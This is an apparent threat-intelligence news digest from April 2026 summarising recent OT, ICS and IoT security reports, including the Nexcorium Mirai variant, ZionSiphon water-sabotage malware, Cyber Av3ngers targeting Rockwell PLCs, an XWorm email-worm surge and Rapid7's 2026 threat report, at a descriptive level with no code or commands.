April 18, 2026
The OT, ICS, and IoT threat landscape continues to evolve rapidly, with emerging malware variants, targeted sabotage campaigns, and escalating cyber espionage activities posing significant risks to critical infrastructure worldwide. Recent findings highlight the increasing sophistication of attackers exploiting known vulnerabilities, leveraging advanced persistence mechanisms, and accelerating attack timelines, underscoring the urgent need for enhanced defensive measures across industrial environments.
Mirai Variant Nexcorium Exploits CVE-2024-3721 to Hijack TBK DVRs for DDoS Botnet
Security researchers have identified a new Mirai botnet variant named Nexcorium that exploits CVE-2024-3721, a command injection vulnerability in TBK DVR-4104 and DVR-4216 devices. The malware also targets Huawei HG532 routers via CVE-2017-17215 and uses brute-force Telnet attacks with hardcoded credentials to propagate. It establishes persistence through crontab and systemd services before deleting itself to evade detection. Additionally, Palo Alto Networks Unit 42 reported active exploitation of CVE-2023-33538 against end-of-life TP-Link routers, further expanding the botnet’s reach.
Source: The Hacker News
ZionSiphon: Sabotage-Capable ICS Malware Targets Israeli Water Infrastructure
Darktrace researchers uncovered ZionSiphon, a specialized OT/ICS malware designed to sabotage Israeli water treatment and desalination systems by manipulating chlorine dosing and hydraulic pressure via industrial protocols such as Modbus, DNP3, and S7comm. Although a logic flaw currently prevents the malware’s execution, the sabotage payload is fully developed and could become operational with minor code adjustments. The threat is rated critical, with MITRE ICS techniques indicating manipulation of control parameters and program downloads, suggesting a high-impact risk to water infrastructure.
Iranian Cyber Actors (Cyber Av3ngers) Escalate Targeting of OT/ICS Devices
Palo Alto Networks Unit 42 has identified a new Iranian threat cluster, CL-STA-1128 (aka Cyber Av3ngers), intensifying attacks against OT/ICS devices from Rockwell Automation. The group has shifted focus from Unitronics PLCs to Allen-Bradley SCADA systems, deploying FactoryTalk software on VPS infrastructure to facilitate exploitation. Global scanning revealed over 5,600 exposed Rockwell Automation devices since April 1, while CISA confirmed ongoing exploitation of Allen-Bradley PLCs. Iranian IP activity surged dramatically, indicating a significant escalation in hostile cyber operations targeting industrial environments.
Email-Borne Worm Surge Drives New Threat Wave Across Industrial Control Systems
Kaspersky Securelist reports a global surge in email-borne worms targeting ICS environments during Q4 2025. The Backdoor.MSIL.XWorm malware spread rapidly through phishing campaigns disguised as job applications, affecting ICS networks worldwide within two months. The oil and gas sector, especially in Russia and Central Asia, experienced the highest infection rates. The worm establishes persistence and remote control channels, enabling interference with OT processes, while worm-blocking activity on ICS computers increased by 60% during the period.
Rapid7 2026 Global Threat Landscape Report: Critical Vulnerabilities Surged 105%, Attack Timelines Collapsed
Rapid7’s 2026 Global Threat Landscape Report reveals a 105% increase in exploited high and critical severity vulnerabilities from 2024 to 2025. The median time from vulnerability disclosure to inclusion in CISA’s KEV catalog has decreased to five days, accelerating attacker exploitation. Incident response investigations show that nearly 44% involved valid accounts lacking proper MFA, and ransomware was implicated in 42% of MDR cases. The report highlights AI-driven acceleration of attacks and advanced evasion techniques such as “Living Off the App” strategies adopted by APT groups.
Source: Rapid7 / Cyber Risk Leaders
